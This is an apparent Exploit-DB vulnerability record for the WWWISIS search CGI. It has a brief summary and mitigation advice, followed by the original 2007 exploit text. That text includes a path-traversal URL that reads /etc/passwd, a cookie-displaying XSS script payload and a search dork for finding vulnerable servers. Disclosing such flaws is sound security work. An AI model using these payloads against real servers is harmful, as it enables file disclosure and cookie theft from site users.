WWWISIS (Search) Multiple Vulnerabilities

vendor:

WWWISIS

by:

JosS

5.5

CVSS

MEDIUM

Local File Disclosure, Cross Siting Scripting

22, 79

CWE

Product Name: WWWISIS

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

WWWISIS (Search) Multiple Vulnerabilities

The exploit allows an attacker to disclose local files and execute arbitrary scripts on the server. The Local File Disclosure vulnerability can be exploited by accessing the server's CGI script with a specially crafted path, while the Cross Siting Scripting vulnerability can be exploited by injecting malicious scripts into the server's CGI script.

Mitigation:

To mitigate the Local File Disclosure vulnerability, ensure that the server's CGI script properly sanitizes user input. To mitigate the Cross Siting Scripting vulnerability, implement input validation and output encoding to prevent script injection.

Source

Exploit-DB raw data:

# WWWISIS (Search) Multiple Vulnerabilities
# Download:
# http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2
# Bug found by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# d0rk: powered by WWWISIS
#Stop lammer


# Local File Disclosure Vulnerability:

http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file]
http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd


# Exploit In (XSS):

http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e
....

[ i,e ... ] it is the language of script

# Cross Siting Scripting:

<script>alert(document.cookie)</script>


//---------------------------------------\\

Greetz To: All Hackers
JosS!

# milw0rm.com [2007-10-13]